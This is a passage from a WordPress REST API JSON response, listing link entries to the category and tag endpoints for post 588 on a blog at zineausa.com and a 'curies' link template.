axonomy":"category","embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/categories?post=588"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/tags?post=588"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}